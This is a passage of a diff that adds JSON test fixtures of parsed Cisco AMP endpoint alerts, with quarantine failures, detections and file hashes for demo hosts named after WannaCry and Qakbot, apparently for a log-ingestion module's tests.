"53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558981", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51525, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558977", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 52645, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 199000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662859016176000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 65285, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:31.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 856000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412662854721208000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 66208, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241035", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 233000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 67131, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241034", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 68332, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 69533, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 90884, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 92070, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 93256, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 